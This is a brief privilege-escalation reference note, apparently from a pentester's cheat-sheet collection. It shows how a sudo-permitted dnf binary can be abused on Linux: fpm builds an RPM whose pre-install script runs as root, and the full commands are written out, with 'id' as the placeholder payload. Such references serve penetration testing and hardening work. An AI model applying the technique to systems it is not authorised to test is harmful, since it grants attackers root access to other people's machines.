~/Privilege Escalation/Linux/Binaries# cat dnf.md

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

It runs commands using a specially crafted RPM package. Generate it with fpm and upload it to the target.

TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

sudo dnf install -y x-1.0-1.noarch.rpm
